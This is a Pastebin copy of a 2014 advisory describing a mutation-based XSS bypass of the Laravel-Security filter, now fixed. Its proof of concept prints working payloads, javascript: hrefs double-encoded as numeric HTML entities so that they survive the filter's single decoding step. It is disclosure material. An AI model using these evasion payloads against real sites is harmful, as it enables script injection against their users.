Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title Lavarel-Security XSS Filter Bypass Vulnerability
- Date add 2014-05-01
- Category web applications
- Platform php
- Risk <font color="#A5DF00">Security Risk Low</font>
- ===================================
- *#Product: Lavarel-Security XSS Filter Bypass*
- *#Vulnerability: Mutation Based XSS Bypass *
- *#Impact: Medium/High*
- *#Authors: Rafay Baloch *
- *#Company: RHAinfoSEC *
- *#Website: http://rhainfosec.com
- *#Status: Fixed*
- *=========*
- *Description*
- *=========*
- Laravel Security is a port of the security class from Codeigniter 2.1 for
- Laravel 4.1. It relies upon a blacklist approach to filter out common
- malicious inputs.
- *=========*
- *Vulnerability*
- *==========*
- The vulnerability lies in the fact that the XSS filter was decoding HTML
- entities, therefore based upon this fact it was
- possible to construct a payload that would successfully bypass the
- filtering mechanisms and execute javascript.
- *=============*
- *Proof of concept*
- *=============*
- During intial test the following input was provided:
- <a
- href="javascript:confirm(1)">Clickhere</a>
- The filter decodes the HTML entities and hence the attack was being
- blocked.
- After Decoding:
- <a href="javascript:alert(1)">Clickhere</a>
- Next, we double encoded the entities:
- <a
- href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
- And since the filter would decode the entities once, we are left with the
- following:
- <a
- href="javascript:confirm(1)">Clickhere</a>
- Which is perfectly a valid syntax inside of href context and would execute
- javascript.
- *===*
- *Fix*
- *===*
- The vulnerability has been fixed, the latest version doesn't decode HTML
- entites and hence the attack is mitigated.
- *==========*
- *References*
- *==========*
- https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement